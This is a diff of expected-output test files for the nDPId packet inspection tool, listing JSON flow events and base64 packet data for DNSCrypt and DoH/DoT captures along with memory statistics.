+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739400581,"flow_last_seen":946739430677,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5345,"flow_avg_l4_payload_len":314,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739400294,"flow_last_seen":946739430460,"flow_idle_time":7440000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5037,"flow_avg_l4_payload_len":314,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":946739661512,"flow_last_seen":946739691599,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":4770,"flow_avg_l4_payload_len":366,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739374011,"flow_last_seen":946739404206,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3125,"flow_tot_l4_payload_len":5512,"flow_avg_l4_payload_len":324,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739311335,"flow_last_seen":946739327906,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1562,"flow_tot_l4_payload_len":5128,"flow_avg_l4_payload_len":301,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946739603327,"flow_last_seen":946739633413,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3014,"flow_tot_l4_payload_len":4605,"flow_avg_l4_payload_len":383,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739401864,"flow_last_seen":946739432023,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6872,"flow_avg_l4_payload_len":381,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739311703,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5538,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":946739378281,"flow_last_seen":946739408545,"flow_idle_time":7440000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6534,"flow_avg_l4_payload_len":284,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739385090,"flow_last_seen":946739415188,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":5274,"flow_avg_l4_payload_len":329,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":946739380870,"flow_last_seen":946739411017,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4647,"flow_avg_l4_payload_len":221,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946739298533,"flow_last_seen":946739298798,"flow_idle_time":7440000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":3077,"flow_avg_l4_payload_len":769,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946739299058,"flow_last_seen":946739299326,"flow_idle_time":7440000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":3075,"flow_avg_l4_payload_len":768,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":946739348407,"flow_last_seen":946739365024,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3098,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":282,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00821{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":946739310588,"flow_last_seen":946739327990,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3100,"flow_tot_l4_payload_len":5402,"flow_avg_l4_payload_len":270,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946739304432,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":8183,"flow_avg_l4_payload_len":272,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739385216,"flow_last_seen":946739415379,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4699,"flow_avg_l4_payload_len":261,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739348961,"flow_last_seen":946739364914,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5460,"flow_avg_l4_payload_len":364,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739305016,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5516,"flow_avg_l4_payload_len":324,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
 00166{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","total-events-serialized":242}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 577/577
@@ -248,9 +248,9 @@
 ~~ total active/idle flows...: 34/34
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4797570 bytes
-~~ total memory freed........: 4797570 bytes
-~~ total allocations/frees...: 100365/100365
+~~ total memory allocated....: 4871699 bytes
+~~ total memory freed........: 4871699 bytes
+~~ total allocations/frees...: 101955/101955
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 171 chars
 ~~ json string max len.......: 4706 chars
diff --git a/test/results/dnscrypt-v2.pcap.out b/test/results/dnscrypt-v2.pcap.out
new file mode 100644
index 000000000..4f7298bd0
--- /dev/null
+++ b/test/results/dnscrypt-v2.pcap.out
@@ -0,0 +1,32 @@
+00443{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946760521313,"flow_last_seen":946760521313,"flow_idle_time":180000,"flow_min_l4_payload_len":1088,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1088,"flow_avg_l4_payload_len":1088,"midstream":0,"ts_msec":946760521313,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":38650,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
+01912{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946760521313,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1130,"pkt_l4_len":1096,"ts_msec":946760521313,"pkt":"AABeAAEK6qmpVXFVCABFAARcbhBAALERNCZ\/AAABfwAAApb6FOkESCe048PqxHAbR9XexWcgBKkL3kOeOPWTE2vKv7G3b+NOW862Bvwb1rheRQpQUH1mr6e8OCu\/fibn8cYTAvsRcNZA8\/lTdO1zXx64xZvGw9jDVohyuD42K8UoR60NkNdqxmDm0qVliFWXizmljTn2lD7CTHoYDdzqjjkHmHHUYe7NejwHo7UzJLYj4uUoMZ5OBbpbxqfekl3zx\/Y\/4Zdyfk6\/03lvMbG9F2W\/akMw4XwHvq2g20\/z7ROpAn9pbnoIPgkT0bVLMUloa6KCu+fPabNALYQCzXjw1dWf3V3HgmcswkwsHKRU4IqCA\/69xcDmnZfgajXBSpNTdHGZU3HrpU7Y+zKoXZQEmeLc30bXeW5a9kf14ALJr7nP37xAYcN4G1BzEhKbbjiDg1A8CDSXiipFooV7yrAiiDZFfq27wAKZRhDngTzeslBwu2i9MUBFZfRNYKakWYXb0zhir5\/O29uGdH+oix0VAlOhQ1zI2Iy777Cmv9swWs1wCBkrJE\/94M4tHF8XTS+kICmBd4\/\/oCbnlEOyxgE0tpl\/nt7We2odNwl1bEewLva0FOnwrRvhVpfaOoXJc9u0J1yVggsuxaSQHVALa0pkLJp+\/KL1C5ympFZjeFktaMfNQOPv5Z3ESCDKvkHzBBiVXNmZyBQJjVm8OJ2VxCOFxQRcEAfIQp56nl1CI6spURDZCsZVp2WuwyXhdsymxVlmsZMvMariZ7h1rbuSEhdHqejvERJd+oAjcCDcUCZYn75DUrNO01fMsDJFP9eRjUktxwy4\/sGlfHHZsXsBQsVS+zNosEiqeQlMFWbk\/CQC\/Iy+m8JNr48sNXZTfXlgESJMZXIJGI3ZhFWluGHRiSLjWQPEgvt0+8gtmgy\/Sb56ZYrX4M7I0sBjqZhkP6vZD63SReYDlzFMUXd7hqpdFD+DjTIU374ZDUKtowMci+TNbopqyz97shtgi2xwOH9hFddB1RkG4yQjJkESvH+dEwGDhiyuqu1jbA0SFR8P5u+YYRQ+42CE\/iBU+jTsoOwxLsuWVcddU3vstbXn6rqxHgTXYGQFfuQtZFvSdKWnmTw8z9w8zndi+uHY\/vuoYXfx78owiiwhQhGyfvFoeyz6rWetZHRBw8zdBPggojOpslDYBovfLfe36dR5k4GtMpkpWYRt2em7VCMyF\/XbQIJEmhp+Ako20cMzqWuCfInK3G1X2JqV5rUe\/hqwd4JCyxrYqNuTc0r7m\/tXkqg9Pt8Nefpg\/ArWfvW+92iTAzlNVO3aq1ykTtQZiIeO81hVzagjUmsfI9nbIftuGPqsEIReSMuv5dWv6UgqYAe4C\/Xx87KHRwvxYrw2wdoQQVmttjR1\/zLAosSHz6yXxjq3yFjyK9Klg3OqBxrG0xMTunO9JWWEVDj8mxnhWJ808mUKd\/9SGzIWV6hSgWaIDqMtm18GCQPG3sT0f23Y6zC5qmo="}
+00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946760521327,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"ts_msec":946760521327,"pkt":"6qmpVXFVLGv1oHfACABFAAEMLuFAADYR8aV\/AAACfwAAARTplvoA+BE2cjZmbnZXajgKUFB9Zq+nvDgrv35wwPFkkokFr1FaigO8H+CEw9XZ9v94iKYdvhofH7\/r0T3rultZ9ZuMYw63KPKpYNyj1i2Vz2KxAnu1y9OcbN8hOMoWFrn1y\/BrWeycOMWNW\/UytoGW9Utt69PEyNka4RcvHRab4iJ\/YjjMR75dgU4mnlrydsdtgAPjXq8XLISW7\/42LpWK7O03ro1N2Q0h\/PZQAkZ8Yr116m7rrS+wia4dqoRvx+npPzTL2uTXQZk6coE4bD7nXs83zCQTiFsawPIKEo\/Czq95ZoX+83ElbKp2Lf2x5F0tvUmYWWas"}
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946760521313,"flow_last_seen":946760521327,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1328,"flow_avg_l4_payload_len":664,"midstream":0,"ts_msec":946760521327,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":38650,"dst_port":5353,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946760605202,"flow_last_seen":946760605202,"flow_idle_time":180000,"flow_min_l4_payload_len":1088,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1088,"flow_avg_l4_payload_len":1088,"midstream":0,"ts_msec":946760605202,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":42883,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
+01896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946760605202,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1130,"pkt_l4_len":1096,"ts_msec":946760605202,"pkt":"AABeAAEK6qmpVXFVCABFAARcltdAALMRCV9\/AAABfwAAAqeDFOkESCe048PqxHAbR9XexWcgBKkL3kOeOPWTE2vKv7G3b+NOW862Bvwb1rheRfk4LvVMuzYHCM64aFNA6T05d8hUdeyA7alWJw86lEbUjUkUtbT59kH5jmUMy6TBNbA9cSZ8ylHF4RX6cVC46FgRWMG7UkBiuIGCYSDYj0qQHCgV\/uKPkd7y7W+9OzpH8mUK0FHIW++OejSvieZlNNJ7hSMqQWE6z3iyVzPN5bD2KljIJn1iUmfgz+QxSJuRx84RGS6ZLYT438yRBqXYq0Vwk3xAT2MdCKiMuYMGqjTyP8B2grnXj9xxXxku1yj6OtSn3nAOQMgpYIcCjgnWS0cRJegnnM5D0O11ZfcQB4Fewco0pEjSFK7kZnpZjtiHj5j7TxqMO4Vn4k86uxQk9GVEN2zODOYc\/yyQRJRQS1vdmwbB8pH1RY9RWIX7c72Uu8J9lT3tB12jgWk7JcvRj3kqUYiVaVTscNevFtQUPd0pSnuajXrJ+hzFBHsYRtQDq\/qTDyuwyCgb8nIkKE96dBEolcLL26\/EMH1RIcplKkl5QSamD4VBOpG8DQ1KIQd5gIQLhlPX6KKqy7L6Do2tx+7dCgtxx1E2Br5zMvuZ\/kHhX+MLJOr0\/iwBeAlPpj1PTcK\/rpOP\/M9aijTDmpjKLIyWYcCRi4HhnB137njSA378aWCbFQ7RmeSIy0aQhzqFaa24Ofa5nIsMouRW4f5GlNLyfxNzMEVOgMupxFBG2voNdFKwsRoKeLkMj7WOY2inFYOw5ZlvlEm8+KlPFlfAPPRaFc4wviLsHB1h5n0OE+4RJNAOIIQjqzgIlOSM8Nf6u6nK9U3brOit1rLsoNbz0kdvgGrYF8iE222nQnizwIIprECi+YiIB1JohhQC2SZBXTJZi6nmVjvNp1U7QtnqJmCDfn5dkvToJTtLdfNYaPdwYRqh9PCxdqOx4DZSEWB8Mcmvv2RlvIDRk4YB8sEcsvl8H3KjJrRLlS2VHOyhoRF4eQShnYQaWWTTPhLW1WnZkJv3V+hfXyWkKSlLqRNpdP6XlsM5ekn2bbYMJyF9X1PMYbcE30O7Cu2G1r8dj6Q3hhF0SdQ5eGuZYgYWN9RTyONhRRMvxQMrb9jKfwKGrdQlTE6utG21dom5hBW5JyJ8gXtHSffRdH1zebg16GOd\/Kdg8neHvERpHgJtjc6onWBEeYVMSOIgY3FsrOPw8Z+8m14x9gAOfHtLW669SkRJ\/5Oy1nHFue3eMdLOD17GsJC9ipo8Nt7h+s4mrZ48orMsFI5zdxcpuO5qIX7Jeo5cM7okkhYTz8e15mkxVdno5gBtUAf8t\/L2X1vjjlcGsVoQKrJmRP1jJTumUkNQcgjkM9fu5JPFOO495nbtE9aMELyNvGpZMayoVzo0osCoDkba4s3ZTHe2irNjakWpfqIdatMniQsiKVkXUcZgJzdhkXaFhlfKxLQ3rNM="}
+00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946760605216,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":946760605216,"pkt":"6qmpVXFVLGv1oHfACABFAADMP0VAADYR4YF\/AAACfwAAARTpp4MAuJEqcjZmbnZXajj5OC71TLs2BwjOuGgg3QrBP5tprFLasOGCi79PkXAdV2PVq+xNqpM\/kysCzgq0+LOYozLThXw1WZc0FtoVVEapHJrtR+84oNppbLRDK7JMS7PVvGlgxZODr7UkO1B\/D0uRd283CHNw\/vIL9BRqAsong3oxZiw5zr2Y3a2cdTof4h\/tWWCDrx7A7RBVG\/GNrFPjnEGOMX+8J1XSUzpJoAL2W7tia8a8E6E="}
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946760605202,"flow_last_seen":946760605216,"flow_idle_time":180000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1264,"flow_avg_l4_payload_len":632,"midstream":0,"ts_msec":946760605216,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":42883,"dst_port":5353,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946760605285,"flow_last_seen":946760605285,"flow_idle_time":180000,"flow_min_l4_payload_len":1088,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1088,"flow_avg_l4_payload_len":1088,"midstream":0,"ts_msec":946760605285,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":50893,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
+01908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946760605285,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1130,"pkt_l4_len":1096,"ts_msec":946760605285,"pkt":"AABeAAEK6qmpVXFVCABFAARclutAALMRCUt\/AAABfwAAAsbNFOkESCe048PqxHAbR9XexWcgBKkL3kOeOPWTE2vKv7G3b+NOW862Bvwb1rheRQw0qtTPgEfkm2BM74ld5CA+W62jGSnjSdoiN3bn9c9nxUkSoDVOuV\/3s7ElHCemxe0UkD1LvUy8p8mkYiyJByZqh\/TL+tyM9BYbJLyKl4eVVVUmkWzlIkQ8\/WuhnpFa3Pnl4FCof4Z1AFcjqWHjHTbQ00s\/sO6ObqcqEHiFQ3+hFKPz9bBRBZWfeqEU3hWWN4OunVcVjBVIH+oyNnf9Ldqyao3Hv1uVLcFryZLWtSTQ+TUZP7RHtGoj4axNiM4Sz7wu2+uP+AibNzkF1m9ssUSp2rQ7tNTH+uxSW1kUeR+13R3ypCAFwJqw\/VTXgzMfvcjuBPHrlpMxG36nZL\/+zwmhxqACloTIurY1g7wfxGufh02FIVF4K+Jc183KeSLvKymakWl1jrazrxgKDGwzCmkm\/qXsOyxoyVo59boGN73vaAXF8yLnk\/4vNz04JxTScUka4TOHKUXW8ZZ543tFdfRvtM2NKx84KnERvuwI\/uotbd04NQpoVtEiRRZMADKfart6